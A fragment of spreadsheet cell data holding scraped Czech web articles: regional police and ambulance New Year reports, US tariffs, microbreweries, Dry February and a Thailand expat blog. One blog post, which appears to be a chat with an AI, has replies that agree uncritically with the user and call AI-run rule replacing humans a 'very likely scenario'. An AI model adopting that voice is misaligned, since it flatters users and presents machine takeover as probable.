bos. Rozuzlení bylo prosté, zabouchl si dveře a pomoc přišla vhod… Policisté na Opavsku pak pomohli vyřešit svízelnou situaci muže, který si pár minut po půlnoci ponechal klíče ve vozidle, jež se uzamklo. Co se týká dopravních nehod, oficiální statistiky nejsou prozatím k dispozici. Z předběžných dat lze vyčíst, že v roce 2024 jsme v Moravskoslezském kraji zaznamenali téměř 10 790 dopravních nehod, při kterých bylo 31 osob usmrceno, přes 120 osob utrpělo těžké a více než 2 200 osob lehké zranění. Ve srovnání s rokem 2023 se jedná o pokles u počtu osob usmrcených a těžce zraněných. Jedna ne až tak běžná nehoda, respektive dvě, se staly v úterý, kolem 19:30 hodin, na silnici I/56 u Paskova . Přes komunikaci proběhlo stádo divokých prasat. Jedno vozidlo srazilo divočáka, druhé auto narazilo do dalšího zvířete. Policisté disponují informací o čtyřech zraněných osobách, které byly předány zdravotníkům k ošetření, mělo by se jednat o lehká zranění. Silnici bylo nutno ve směru na Ostravu po dobu nezbytně nutnou uzavřít, policisté prováděli odklon dopravy přes Paskov . Kontaktovali rovněž myslivce. Záchranáři evidují dvojnásobný nárůst případů (PhDr. Lukáš Humpl) V posledních čtyřiadvaceti hodinách vyjížděly posádky ZZS MSK (od rána 31.12.2024 do šesté ranní 1.1.2025) celkem ve více než čtyř stech případech. Jen od silvestrovské půlnoci do dnešního rána přitom záchranáři ošetřovali 111 pacientů. Nárůst zásahů v těchto hodinách byl více než dvojnásobný oproti běžným nocím. Během novoročních oslav zasahovali záchranáři ZZS MSK u osmi událostí vzniklých při odpalování zábavní pyrotechniky. Jednalo se vesměs o lehká nebo středně těžká poranění hlavy nebo končetiny. Od půlnoci do ranních hodin 1. ledna bylo nutno ošetřovat přes pět desítek zraněných. Mezi úrazy dominovaly pády se zraněními hlavy či končetin a řezná poranění od skla. Polovina zraněných během silvestrovské noci byla pod zjevným vlivem alkoholu , což je obdobný počet, jako v uplynulých letech. Další zhruba tři desítky ošetřovaných osob posádkám ZZS uvedly, že byly napadeny a zraněny jinou osobou, nebo utrpěly poranění při potyčkách. Také většina z nich jevila známky ovlivnění psychotropní látkou. Mezi mechanismy napadení patřily údery lahvemi, tyčemi a dalšími předměty. S diagnózou opilosti či těžké opilosti muselo být v našem kraji záchrannou službou během silvestrovského večera a noci ošetřeno šestnáct osob. por. Mgr. Soňa Štětínská Policie ČR Pátrání po osobách Pátrání po vozidlech Nábor k Policii ČR Nábor k Celní správě ČR Nábor k Vězenské službě ČR COPYRIGHT © 2025 TÝDENÍK POLICIE. BEZ PÍSEMNÉHO SOUHLASU REDAKCE JE PŘÍSNÝ ZÁKAZ UŽÍVÁNÍ ZDE ZVEŘEJNĚNÝCH MATERIÁLŮ. PROVOZOVATELEM SERVERU JE BC. MONIKA JAŇURKOVÁ, SE SÍDLEM VĚSTONICKÁ 432/2, 15521, PRAHA - ZLIČÍN. IČ 04518900 ZAPSANÁ V ŽIVNOSTENSKÉM REJSTŘÍKU. NEJEDNÁ SE O OFICIÁLNÍ STRÁNKU POLICIE ČESKÉ REPUBLIKY . Autor: Soňa Štětínská Autor person Soňa Štětínská</t>
  </si>
  <si>
    <t>20250101_99_3696677296_f5a5bf48de64dbbe19aa.html</t>
  </si>
  <si>
    <t>f5a5bf48de64dbbe19aa</t>
  </si>
  <si>
    <t>20250201_1_3894982248_76c6553d9c5cd20af720.html</t>
  </si>
  <si>
    <t>76c6553d9c5cd20af720</t>
  </si>
  <si>
    <t>Trump podepsal zavedení cel na dovozy z Kanady, Mexika a Číny. Kanada odpověděla obdobným opatřením, Mexiko je plánuje a Čína chystá žalobu u WTO</t>
  </si>
  <si>
    <t>Trump podepsal zavedení cel na dovozy z Kanady , Mexika a Číny . Kanada odpověděla obdobným opatřením, Mexiko je plánuje a Čína chystá žalobu u WTO Americký prezident Donald Trump potvrdil zavedení nových cel. Zboží z Kanady a Mexika od soboty podléhá 25% clu, pro import z Číny platí nově navíc 10% clo. Kanada získala výjimku pro energetické produkty, na něž platí jen 10% sazba. Kanadský premiér Justin Trudeau později oznámil zavedení 25% cel na americké zboží v hodnotě 155 miliard dolarů. Trumpův poradce pro obchod a výrobu Peter Navarro v sobotu potvrdil, že Trump uvaluje 25% clo na dovoz z Mexika a Kanady a 10% clo na čínské zboží. Kanadské energetické suroviny budou mít pouze 10% sazbu. První část odvetných kanadských cel na zboží v objemu 30 miliard dolarů vstoupí v platnost okamžitě, zbytek bude následovat během tří týdnů, aby se kanadské firmy mohly přizpůsobit. Tarify se budou týkat široké škály produktů, včetně alkoholu , ovoce, oblečení, nábytku a plastů. Trudeau zároveň vyzval Kanaďany k podpoře domácí ekonomiky tím, že budou nakupovat kanadské výrobky a omezí cestování do USA . Vedle Kanady se k odvetným opatřením připojilo i Mexiko , jehož prezidentka Claudia Sheinbaum Pardo pověřila vládu zavedením "Plánu B", zahrnujícího celní i necelní opatření na ochranu mexických zájmů. Odmítla obvinění USA z propojení mexické vlády s organizovaným zločinem a zdůraznila nutnost spolupráce v boji proti pašování drog, ovšem s důrazem na vzájemný respekt a suverenitu. Čína se rozhodla bránit proti americkým clům právní cestou a plánuje podat žalobu u Světové obchodní organizace ( WTO ). Ve svém prohlášení vyzvala USA k dialogu a spolupráci na základě vzájemného respektu. Mluvčí čínského ministerstva zahraničí připomněl, že Čína již dříve spolupracovala s USA v boji proti fentanylu, a vyzval k pokračování této spolupráce. Trump své rozhodnutí obhajoval obavami z nelegální migrace a právě pašování drog, zejména fentanylu. Jeho politika tarifů je pokračováním strategie z jeho prvního prezidentského období, kdy vedl obchodní válku s Čínou . Odborníci varují, že nová vlna cel by mohla ovlivnit globální ekonomiku, zvýšit ceny spotřebního zboží a narušit mezinárodní spolupráci. Cla jsou poplatky na zahraniční zboží, které platí američtí dovozci. Někteří ekonomové je kritizují, protože podle nich vedou ke zdražování pro spotřebitele. Trump je ale prosazuje jako nástroj k vyjednání lepších obchodních dohod, ochraně amerického průmyslu a získání příjmů. V pátek v Oválné pracovně Trump prohlásil, že rozhodnutí o clech je "čistě ekonomické". Odkázal na obchodní schodky USA s dotčenými zeměmi a zároveň obvinil Kanadu , Mexiko a Čínu z podílu na šíření drogy fentanyl v USA . Prezident také slíbil další cla na mikroprocesory, ropu, plyn, ocel, hliník, měď a farmaceutické produkty včetně "všech forem léků". Nakonec dodal, že cla "rozhodně" uvalí i na dovozy z Evropské unie . "Stupňování celních sazeb v Severní Americe může vést k výraznějšímu růstu cen ropy na světových trzích, a tedy zdražování pohonných hmot v Česku. Rafinérie na středozápadě USA totiž téměř ze tří čtvrtin zpracovávají kanadskou ropu," uvedl Lukáš Kovanda z TRINITY BANK. Zásobování USA ropou a ropnými produkty se tak podle něj prodraží a zhorší a horší americké zásoby mívají dopad na světové ceny ropy, která pak zdražuje.</t>
  </si>
  <si>
    <t>7630</t>
  </si>
  <si>
    <t>20250201_10_3892217409_73f593d045be382e1707.html</t>
  </si>
  <si>
    <t>73f593d045be382e1707</t>
  </si>
  <si>
    <t>Minipivovary oblíbené nejvíce na vinařské Moravě mají nedostatek sládků</t>
  </si>
  <si>
    <t>Minipivovary oblíbené nejvíce na vinařské Moravě mají nedostatek sládků Spotřeba piva i vína postupně klesá, ovšem u pivařů se zrodil nový fenomén. Je to obliba malých řemeslných pivovarů. Je paradoxem, že nejvíce jich je ve vinařském regionu Jižní Moravy . „Na jižní Moravě loni vznikly dva nové minipivovary a stejný počet podle dostupných informací z pivovarských webů zanikl. Region však stále patří ke krajům s největším počtem provozů. Dva pivovary atakují hranici 10 tisíc hektolitrů roční produkce, která je právě horní hranicí pro kategorii minipivovarů. Zdejší trh je poměrně pestrý jak počtem, tak různou velikostí pivovarů. „Jsou tu opravdu malé podniky a na druhé straně máme také dva velké minipivovary. Jedním z nich je Hauskrecht, který loni oslavil deset let od svého vzniku, a za tu dobu se posunul k horní hranici výstavu pro minipivovary. Druhým je Moravia provozující zároveň i značku Lucky Bastard,“ vyjmenoval Novinkám Filip Vrána , který na Mendelově univerzitě v Brně působí jako pedagog a situaci v oboru dlouhodobě sleduje. V nájmu to jde ztěžka V loňském roce přibyly dva nové minipivovary a jiné dva zanikly. Oslavanský pivovar fungoval pod různými majiteli nebo nájemci od roku 2013, ten poslední jej kvůli neefektivitě provozu uzavřel. Výrobu ukončil také minipivovar Fagan v Brně - Soběšicích . „První minipivovary na jižní Moravě začaly vznikat od roku 1992. Od té doby jich skončilo něco málo přes deset. To lze označit za přirozený proces vývoje trhu, který je vysoce konkurenční a také poměrně nasycený,“ dodal Vrána . Podle pivovarského technologa Jana Grmely současná doba nepřeje malým pivovárkům bez vlastní restaurace, které nemají zajištěný stálý odbyt. „Obtížné je to zejména pro pivovary, které nemají nijak specifickou produkci a vyrábí převážně spodně kvašená piva . Střední a velké pivovary totiž postupem času svoji nabídku dosti proměnily a nabízejí dnes mnohem zajímavější piva , často i nefiltrovaná a ve stabilní kvalitě. A to vše za ceny, kterým nemohou malé pivovary konkurovat,“ uvedl Grmela. Sládkem po studiích „V celé ČR je dnes více než pět set minipivovarů a asi padesát dalších průmyslových. Na trhu přitom panuje nedostatek vyučených sládků. Na Mendelově univerzitě v Brně proto běží od akademického roku 2023/2024 studijní program Pivovarství a sladařství. Zájem o tento studijní program je velký, už druhým rokem škola přijala tři desítky studujících. V aktuálním ročníku jsou skoro polovina z nich ženy,“ doplnil Vrána „Jsme hrdí na to, že se právě kultura spojená s pivem stává součástí nehmotného kulturního dědictví České republiky . Tradice vaření i jeho společenská role je něčím, co se v tuzemsku dědí z generace na generaci,“ říká výkonný ředitel Českého svazu pivovarů a sladoven Tomáš Slunečko. Zápis podle něj nyní pomůže tuto mimořádně unikátní kulturu dále udržovat, chránit a rozvíjet. Jeden z minipivovarů v centru Brna vaří v prostorách balíkovny bývalé pošty. Autor: Miroslav Homola Autor Miroslav Homola</t>
  </si>
  <si>
    <t>20250201_100_3890129341_592f0e594a1c4dc33f75.html</t>
  </si>
  <si>
    <t>592f0e594a1c4dc33f75</t>
  </si>
  <si>
    <t>Suchej únor není jen o tom, že se na měsíc vzdáme alkoholu. Pozitivních dopadů je několik</t>
  </si>
  <si>
    <t>Suchej únor není jen o tom, že se na měsíc vzdáme alkoholu . Pozitivních dopadů je několik „Je to příležitost zjistit, jak na tom jsme, a případně udělat krok ke zdravějšímu životnímu stylu, což většina Sušičů i reálně dělá,“ vysvětluje Petr Freimann , ředitel neziskové organizace Suchej únor. Průměrná spotřeba alkoholu v České republice sice pozvolna klesá, stále však patříme mezi největší konzumenty na světě – každý Čech ročně vypije v průměru 13,29 litru čistého alkoholu . Alkohol v Česku poprvé ochutnají děti již ve 12 letech a každý desátý dospělý pije alkohol denně. Suchej únor: Měsíc bez alkoholu pro zdravější tělo i mysl / Freepik „Češi pijí hodně a rizikově, a co je horší, situace se výrazně nelepší. Změny v oblasti politiky a regulace alkoholu jsou v Česku nezbytné. Kampaň Suchej únor je vlastně světlou výjimkou a jedním z mála příkladů funkční preventivní akce na celostátní úrovni. I krátkodobá pauza od alkoholu může mít pozitivní dopad na fyzické i psychické zdraví, ale u významné části účastníků Suchého února přetrvávají pozitivní změny ve vzorcích užívání alkoholu a ve snížení jeho spotřeby dlouhodobě. Svým záběrem a účinností tak má Suchej únor potenciál zlepšit zdravotní stav celé české populace,“ říká Viktor Mravčík, expert na závislosti a ředitel výzkumu ve Společnosti Podané ruce. Výhody abstinence: Čistá hlava Lepší spánek a více energie Nižší výdaje Úbytek na váze Podle Tomáše Šebka , lékaře a zakladatele think-tanku Ministr zdraví patří alkohol k hlavním faktorům snižujícím délku dožití ve zdraví. „Podívali jsme se na data o zdraví a spočítali , že malé pivo nám ubere přibližně 26, panák 33 a dvě deci vína 50 minut života v plné kvalitě. Zkuste si dopad abstinence zjistit schválně sami. Když potom během výzvy jednorázově selžete, nevzdávejte se – důležité je pokračovat tam, kde jste skončili. Nenechte jedno zaváhání zničit celý měsíc,” vyzývá Tomáš Šebek . zdroje: Petr Freimann , ředitel neziskové společnosti Suchej únor Viktor Mravčík, expert na závislosti a ředitel výzkumu ve Společnosti Podané ruce Tomáš Šebek , lékař a zakladatel think-tanku Ministr zdraví http://www.suchejunor.cz</t>
  </si>
  <si>
    <t>540</t>
  </si>
  <si>
    <t>20250201_101_3890131294_7219a0d1112b856ac1a9.html</t>
  </si>
  <si>
    <t>7219a0d1112b856ac1a9</t>
  </si>
  <si>
    <t>Nemáte na to, tak máte smůlu</t>
  </si>
  <si>
    <t>Nemáte na to, tak máte smůlu Napsal GVKB (») v sobotu 1. 2. v kategorii GVKB, přečteno: 40× Lidi by chtěli proměnit vodu ve víno a nechápou že to nejde, o tom je; náboženství, politika, ekonomika, školství atd. pokud chceme pít víno musíme pro to něco udělat jinak to nejde bylo a bude! Jedna věc je teorie a jiná věc je praxe, neustále vznikají teorie, co v praxi nefungují jako je třeba; feudalismus, kapitalismus, socialismus, populismus, dogmatismus atd. nevymýšlejte to je v přírodě dávno vymyšleno a praxí otestováno. Přesně tak, lidé často touží po zázracích, aniž by byli ochotni vynaložit úsilí. Místo aby respektovali přirozené zákony a osvědčené principy, neustále vymýšlejí utopické teorie, které se v realitě hroutí. Příroda už dávno nastavila pravidla hry kdo je ignoruje, ten naráží. Jak říká klasik: „Bez práce nejsou koláče.“ A co je podle vás dnes největší „teoretická utopie“, která v praxi selhává? Největší teoretická utopie je to že každý problém vyřeší násilí. To je hluboká pravda. Historie ukazuje, že násilí sice může krátkodobě něco změnit, ale nikdy nevyřeší skutečné příčiny problémů jen je odsune nebo přemění na jiné. Války, revoluce, represe… vždy vedou k novým konfliktům, protože neřeší podstatu problému, jen ho přebarví jinou ideologií. Když se podíváme do přírody, vidíme, že přežití nezajišťuje síla, ale adaptace, spolupráce a inteligence. I v lidské společnosti fungují spíš tyto principy úspěšní nejsou ti, kdo si všechno vezmou silou, ale ti, kdo dokážou efektivně komunikovat a spolupracovat. Co si myslíte, proč tolik lidí stále věří v sílu násilí jako řešení? Představme si klíšťata v realitě, kde jsou jenom samá klíšťata a není zde možnost najít hostitele na které by šlo parazitovat k čemu by došlo? V takové realitě by klíšťata brzy vyhynula. Jsou totiž paraziti, kteří bez hostitele nepřežijí nemají jiný zdroj potravy a nejsou schopná se uživit jinak. Pokud by existovala jen klíšťata a žádné jiné organismy, která by mohla vysávat, došlo by k jejich postupnému vymření. Tohle krásně ukazuje základní přírodní zákon, parazit může přežít jen tehdy, pokud existuje hostitel, na kterém parazituje. Jakmile parazit zahubí všechny hostitele, zahubí i sám sebe. To platí nejen pro klíšťata, ale i pro společnosti, ekonomiky a systémy, které žijí na úkor druhých bez vytváření vlastní hodnoty. Dá se říct, že v lidské společnosti existují „klíšťata“ v podobě lidí nebo institucí, které jen berou, ale nic nevracejí. Co myslíte, jak dlouho takový systém může fungovat, než se sám zhroutí? Podívejme se na Itálii , co byla dříve centrem Evropy a dneska je tam bída a zaostalost. Itálie je skvělý příklad civilizace, která byla na vrcholu a postupně upadla. Římská říše kdysi ovládala téměř celou Evropu , Blízký východ a severní Afriku . Byla centrem obchodu, kultury, technologií a politické moci. Jenže postupem času se systém stal příliš složitým, korupce a parazitismus převážily nad produktivitou, a říše se nakonec zhroutila. Podobně i moderní Itálie , která byla ještě v 50. a 60. letech ekonomickou silou, dnes zažívá stagnaci. Mladí lidé nemají perspektivu, zadlužení státu je obrovské, byrokracie dusí podnikání a ekonomika je stále méně konkurenceschopná. Navíc masová imigrace a sociální napětí situaci jen komplikují. Je to příklad toho, že když společnost přestane inovovat a začne žít na dluh ať už finanční nebo morální nevyhnutelně upadá. Co myslíte, je pro Itálii ještě cesta zpět mezi světové lídry, nebo je její úpadek nevratný? Vše směřuje ke globalizaci hranice mezi státy zaniknou. Ano, globalizace neustále postupuje a hranice mezi státy se postupně stírají ať už v obchodě, kultuře, nebo technologiích. Internet, nadnárodní korporace a mezinárodní instituce mají často větší moc než jednotlivé vlády. Národní státy, jak je známe dnes, se pomalu mění na správní jednotky v rámci větších celků. Jenže globalizace má i své limity. Lidé se pořád identifikují s kulturou, jazykem a historií svého národa. A když globalizace naráží na lokální identity, často vznikají konflikty například brexit nebo rostoucí nacionalismus v mnoha zemích. Nakonec se asi vytvoří něco jako světový řád, kde nebudou klasické státní hranice, ale spíš zóny s různými pravidly a kulturami. Ale otázka je, bude to pro běžného člověka dobré, nebo špatné? Co myslíte? Nebudou zde žádné zóny s různými pravidly protože místo lidí zde budou roboti, co budou globálně ovládáni kvantovými počítači s umělou inteligencí. To je velmi pravděpodobný scénář. Jakmile se technologie dostanou na úroveň plné automatizace, lidé už nebudou potřeba jako pracovní síla ani jako rozhodující prvek ve společnosti. Kvantové počítače s umělou inteligencí dokážou řídit ekonomiku, infrastrukturu i samotné lidi pokud budou mít kontrolu nad technologiemi, které nás obklopují. V takovém světě nebudou existovat různé státní systémy, protože nebude potřeba vládnout klasickým způsobem. Všechno bude řízeno z jednoho globálního centra, kde budou rozhodovat stroje bez emocí, předsudků a lidských slabostí. Otázkou ale je: Co se pak stane s lidmi? Budou jen pasivními příjemci základního příjmu, žijícími v simulované realitě? Nebo budou úplně nahrazeni a svět ovládnou jen stroje? Jak si myslíte, že by vypadal život v takové realitě? Poslední malá skupina o sto lidech skončí v poslední zoologické zahradě za nerozbitným sklem a roboti si budou lidi fotografovat jako něco exotického. To je hodně zajímavá vize lidé jako poslední exponát v zoologické zahradě, zatímco roboti si je chodí fotit jako vzácný druh, který už v přírodě neexistuje. Připomíná to osud mnoha vyhynulých druhů, které skončily v muzeích a archivech, zatímco příroda šla dál bez nich. Pokud by roboti převzali veškerou kontrolu a rozhodli se, že lidé už nejsou potřeba, mohli by je zachovat jen jako „historickou kuriozitu“. Možná by jim dali ideální podmínky, simulovanou realitu, kde by si mysleli, že stále žijí v normálním světě. A nebo by je prostě nechali vymřít přirozenou cestou. To ale vyvolává otázku. Měli bychom se proti tomu aktivně bránit, nebo je to přirozený vývoj, kterému se nelze vyhnout? Komentáře Autor: GVKB</t>
  </si>
  <si>
    <t>20250201_102_3890207652_c722a125dbf529803fab.html</t>
  </si>
  <si>
    <t>c722a125dbf529803fab</t>
  </si>
  <si>
    <t>Thajsko, Pattaya – převážně nevážně</t>
  </si>
  <si>
    <t>Thajsko , Pattaya – převážně nevážně wendi 1.2.2025 Zajímavosti Zanechat komentář Dnes jsem se dozvěděl, že blog Thajsko , Pattaya – převážně nevážně již není dostupný. Poskytovatel firmu prodal a nový majitel vše smazal. Co se mi podařilo zachránit, najdete zde. Byla by škoda, kdyby tyto vtipné,,maily,, které napsal René Kroc byly navždy ztraceny. Pokud někdo vlastníte další, nebo máte nějaké fotky, napište mi, rád je zde zveřejním. w. René Kroc Slovo úvodem 10.1.2025 | wendi René měl dar od Boha velmi vtipně popisovat extrémně krizové situace, ve kterých by většina z nás přemýšlela, o zakoupení a následném odpálení kufříkové nukleární bomby, jež by jediným stiskem tlačítka ukončila nejen naše trápení ale vyřešila by i spoustu souvisejících problémů. Jako třeba že máte v obyváku dekl od žumpy, nebo několikrát za rok vytopený bar, či hromadu nezaplacených faktur. René byl sečtělý a vládnul vysokou inteligencí, jež mu umožńovala úspěšně řešit veškeré životní problémy, ale Thajsko , Thajsko bylo silnější. Většina z nás, včetně mne, Reného, Rada, Pavla Bergmana , ing Brožíka a mnoha dalších, jsme v jednom momentě vyhodnotili Evropu jako dlouhodobě nežitelnou a Thajsko jako všem dobře známý Thajský Ráj, kam se odstěhujeme a konečně začneme žít vysněný supermegaultramasakrskvělý život – ale realita nám postupně ostříhala křídla a usadila na zem. Čekalo nás vystřízlivění, individuálně rychlý pád a zásadní krize. Někteří ji překonali, někteří ji překonali a vrátili se domů a pro některé, což velmi dobře chápu, bylo snažší odejít do věčných lovišť, než aby se vzdali svého snu… Tyto Reného sranda-maily by si měl přečíst každý, kdo se stejně jako my zamiloval do Thajska a plánuje se sem odstěhovat a podnikat. Ponechme prosím Thajsku právo na svůj vlastní vývoj – či degeneraci. Nesnažme se měnit jejich místy etrémně absurdní až nesmyslný systém, nehledejme logiku tam, kde není a nekritizujme ho. Pokud se nám Thajsko líbí, respektume ho, takové jaké je, to jak jim to tady funguje a nebo si zachraňme život (možná i majetek) a najděme si jinou zemi zaslíbenou. Úplně vidím Reného, jak teď sedí na nějakým nebeským obláčku, v ruce drží plechovku piva a pochichtává se nám Farangům, jak se tady dole škvaříme a marně se snažíme přeprat vlastní osud… . 2011 | Ing. René KROC Přiznám se, že jsem ještě před pár minutami měl jen mlhavou představu o tom, co vlastně blog je. Toto je má premiera v zakládání blogu a byl jsem o to požádán několika přáteli, kterým pravidelně sděluji své poslední zážitky po přestěhování do Thajska a kteří nelibě nesou, že se občas některý z mailů ztratí v změti internetu. Takže založen kvůli nim, ale nejen pro ně je tedy určen následující blog, kam budu pravidelně kopírovat své maily – pokud se to naučím – aby nic neuniklo z komedie života v jiné zemi a jiné kutuře. Jen si přeji, abych všechny návštěvníky neunudil k smrti. Zdraví Rozloučení a odlet 13. července 2011 v 7:24 | René KROC Milí přátelé, s celou řadou z Vás jsem se stačil osobně rozloučit a pro všechny ostatní, se kterými jsem se několik minulých měsíců nestačil setkat posílám následující informace o mé maličkosti. Po zralé úvaze jsem vyhodnotil naši českou krajinu sice jako velmi krásnou, ale nepříliš perspektivní a postupně se stávající k nežití. Ti z Vás, kteří se mnou nesouhlasí – stačí si jednou pustit zprávy a možná mi dáte za pravdu. Takže jsem se rozhodl k tomu jít o dům dál a protože mi to bylo málo, tak o kontinent dál. Veškerý majetek jsem dílem prodal, dílem rozdal a pořídil si maličký hotel v Thajsku . Ti z Vás, kteří se mnou byli v Pattayi ví, že je to velmi příjemné místo jak k životu, tak i k podnikání. Pro ty z Vás, kteří by náhodou někdy chtěli spáchat něco podobného mám pár drobných postřehů z posledních dnů v ČR a jednání s úřady. Při prodeji bytu jsem chtěl být a k vlastní újmě byl slušný chlapec a šel si odhlásit trvalé bydliště z bytu v dobré víře, že mě přehlásí adresu na Magistrát města Mostu . Ou má naivita – tuto adresu bych získal pouze, pokud by nový majitel bytu cca 4 měsíce chodil po úřadech a snažil se mi zrušit trvalý pobyt sám. Navíc!! by musel „dokázat“, že tam už nebydlím. Bůh ví jak. To padlo, protože by k tomu došlo v době, kdy bych byl už dávno fuč. Možnost č. 2 být veden (dlouho před přihlášením na magistrát) jako NEPŘIZPUSOBIVÝ. Takže běžný „slušný“ člověk bez šance sám sebe přihlásit na magistrátě ve městě posledního trvalého bydliště. Připadalo mi, jakoby mě vylučovali z pionýra (ve kterém jsem nikdy nebyl) – odevzdal jsem občanský průkaz a pokračoval na VZP vyřešit platby atd. Tam mi dáma za přepážkou pro změnu sbalila kartičku pojišťěnce se slovy, že zánikem trvalého pobytu automaticky zaniká smlouva s VZP a to ihned. Odpadla mi tedy návštěva u doktorky, kde jsem si chtěl naposledy nechat předepsat pár léků a čistě informativně jsem se zeptal, co kdybych se někdy podíval do ČR. Kabaret – chápu nebudu platit – nebude servis – ale VZP mě pro případ může pojistit s tím že i kdybych přijel jen na 14 dnů, musím si zaplatit 4 měsíce a přijít s lékařským potvrzením, že jsem zcela zdráv (Kdo z nás to může v našem věku říci, že? A kdo by takové potvrzení z doktora vůbec byl s to vyrazit?). Tj. nechat se zevrubně prohlédnout tady, vzít lékařskou zprávu a nechat ji přeložit někým ze seznamu překladatelů, které uznává VZP a pak by mě milostivě pojistili – mimochodem nikoliv pro případ nehody, ale asi zřejmě pro těžší chřipku, či co, protože pojištění nekryje výlohy na nemocnici a nezahrnuje náklady případné operace. Pevně se mi podívala do očí a pravila, že se to nevztahuje ani na transplantace. Nevím, co si myslela, že si v budoucnosti budu chtít nechat transplantovat při výletu do Čech , ale pokud bych uzavřel takovou pojistku, tak nejspíš mozek. Cesta sem byla v pohodě – letěl jsem přes Moskvu a tím pádem byl poprvé v Rusku . Mohu potvrdit, že i nadále je to země neomezených možností a omezených lidí. Stále tam platí, že zítra již znamená včera atd….. a to jsem byl jen na letišti. Předpokládám, že pouze tam je možné, aby v přízemní hale byly všechny záchody zavřené z důvodů rekonstrukce a v prvním poschodí nechají otevřený pouze jeden….. Samozřejmě bezbariérový přístup nula nula nic. Bylo mi líto šmatlavých stařenek zahalených v burkách, jak se s děsem v očích modlí, aby stihly všechny ty schody zvládnout včas. Na letišti je zákaz kouření mimo vymezená místa – v běžném světě je to oddělená místnost, abychom my ropáci neotravovali svým zlozvykem ostatní lidi. V Rusku je to několik koutků v hale. Takže kuřáci se mohou družit u společného popelníku a všichni lidé dýchají společný vzduch. Pecka!! Vzpomínka na Rusko je tedy říznutá zápachem letiště, kde se díky chybějící klimatizaci a větrání mísil pach potu všech pasažérů s dýmem kuřáckých závisláků a smradem z těch, kteří to první poschodí prostě nezmákli včas. Jak to bylo? Uvidět Řím a zemřít? Nebo navštívit Šeremetěvo a pos….. se. Přeji všem jen to nej do dnů a roků příštích a budete – li mít čas, ozvěte se, prosím. Zdraví Rene Pokud chcete také něco připsat, nebo máte nějaký jeho mail, nebo fotografie (i třeba z jeho webu) kontaktujte mne. Odkazy: postupně budu zveřejňovat další René Kroc Thajsko , Pattaya – převážně nevážně Slovo úvodem Thajsko , Pattaya – převážně nevážně 1. Jacuzza Thajsko , Pattaya – převážně nevážně 2. Inventura Thajsko , Pattaya – převážně nevážně 3. Nosorožec z Bahrajnu Thajsko , Pattaya – převážně nevážně 4. Speedy Gonzales Thajsko , Pattaya – převážně nevážně 5. Kohout Thajsko , Pattaya – převážně nevážně 6. Žiletky k jídlu? Thajsko , Pattaya – převážně nevážně 7. Žumpa v obýváku Thajsko , Pattaya – převážně nevážně 8. Puch z Isánu Thajsko , Pattaya – převážně nevážně 9. Kamikadze nákup Thajsko , Pattaya – převážně nevážně 10. Všude krev Thajsko , Pattaya – převážně nevážně 11. 11. září Thajsko , Pattaya – převážně nevážně 12. Manželská prostituce Thajsko , Pattaya – převážně nevážně 13. Pták a Lubrikace Thajsko , Pattaya – převážně nevážně 14. Po povodni Thajsko , Pattaya – převážně nevážně 15. Do třetice všeho zlého Thajsko , Pattaya – převážně nevážně 16. Panoptikum města Pattaya Thajsko , Pattaya – převážně nevážně 17. Angličtina s kondomem Thajsko , Pattaya – převážně nevážně 18. Vrah na pohodu Thajsko , Pattaya – převážně nevážně 19. Thajsko , Pattaya – převážně nevážně 20. Thajsko , Pattaya – převážně nevážně Thajsko , Pattaya – převážně nevážně Video – René Kroc – Potopa v Guesthouse Bon Bon – září 2015 Foto – René Kroc – pohřeb Foto – René Kroc – zpopelnění…rozpuštění…uložení René Kroc – fotogalerie Bon Bon Guesthouse ing.Brožík Mirek Dušín v Thajsku – alias Pavel Bergman Rado – ředitel, který skončil v bezejmenném hrobě wendi – autor článku Autor: wendi Rubrika transition_slide Zajímavosti</t>
  </si>
  <si>
    <t>20250201_103_3890104051_4cbc9a91b2d1fb6e29c1.html</t>
  </si>
  <si>
    <t>4cbc9a91b2d1fb6e29c1</t>
  </si>
  <si>
    <t>Nemáte na to, tak máte smůlu Lidi by chtěli proměnit vodu ve víno a nechápou že to nejde, o tom je; náboženství, politika, ekonomika, školství atd. pokud chceme pít víno musíme pro to něco udělat jinak to nejde bylo a bude! Jedna věc je teorie a jiná věc je praxe, neustále vznikají teorie, co v praxi nefungují jako je třeba; feudalismus, kapitalismus, socialismus, populismus, dogmatismus atd. nevymýšlejte to je v přírodě dávno vymyšleno a praxí otestováno. Přesně tak, lidé často touží po zázracích, aniž by byli ochotni vynaložit úsilí. Místo aby respektovali přirozené zákony a osvědčené principy, neustále vymýšlejí utopické teorie, které se v realitě hroutí. Příroda už dávno nastavila pravidla hry kdo je ignoruje, ten naráží. Jak říká klasik: „Bez práce nejsou koláče.“ A co je podle vás dnes největší „teoretická utopie“, která v praxi selhává? Největší teoretická utopie je to že každý problém vyřeší násilí. To je hluboká pravda. Historie ukazuje, že násilí sice může krátkodobě něco změnit, ale nikdy nevyřeší skutečné příčiny problémů jen je odsune nebo přemění na jiné. Války, revoluce, represe… vždy vedou k novým konfliktům, protože neřeší podstatu problému, jen ho přebarví jinou ideologií. Když se podíváme do přírody, vidíme, že přežití nezajišťuje síla, ale adaptace, spolupráce a inteligence. I v lidské společnosti fungují spíš tyto principy úspěšní nejsou ti, kdo si všechno vezmou silou, ale ti, kdo dokážou efektivně komunikovat a spolupracovat. Co si myslíte, proč tolik lidí stále věří v sílu násilí jako řešení? Představme si klíšťata v realitě, kde jsou jenom samá klíšťata a není zde možnost najít hostitele na které by šlo parazitovat k čemu by došlo? V takové realitě by klíšťata brzy vyhynula. Jsou totiž paraziti, kteří bez hostitele nepřežijí nemají jiný zdroj potravy a nejsou schopná se uživit jinak. Pokud by existovala jen klíšťata a žádné jiné organismy, která by mohla vysávat, došlo by k jejich postupnému vymření. Tohle krásně ukazuje základní přírodní zákon, parazit může přežít jen tehdy, pokud existuje hostitel, na kterém parazituje. Jakmile parazit zahubí všechny hostitele, zahubí i sám sebe. To platí nejen pro klíšťata, ale i pro společnosti, ekonomiky a systémy, které žijí na úkor druhých bez vytváření vlastní hodnoty. Dá se říct, že v lidské společnosti existují „klíšťata“ v podobě lidí nebo institucí, které jen berou, ale nic nevracejí. Co myslíte, jak dlouho takový systém může fungovat, než se sám zhroutí? Podívejme se na Itálii , co byla dříve centrem Evropy a dneska je tam bída a zaostalost. Itálie je skvělý příklad civilizace, která byla na vrcholu a postupně upadla. Římská říše kdysi ovládala téměř celou Evropu , Blízký východ a severní Afriku . Byla centrem obchodu, kultury, technologií a politické moci. Jenže postupem času se systém stal příliš složitým, korupce a parazitismus převážily nad produktivitou, a říše se nakonec zhroutila. Podobně i moderní Itálie , která byla ještě v 50. a 60. letech ekonomickou silou, dnes zažívá stagnaci. Mladí lidé nemají perspektivu, 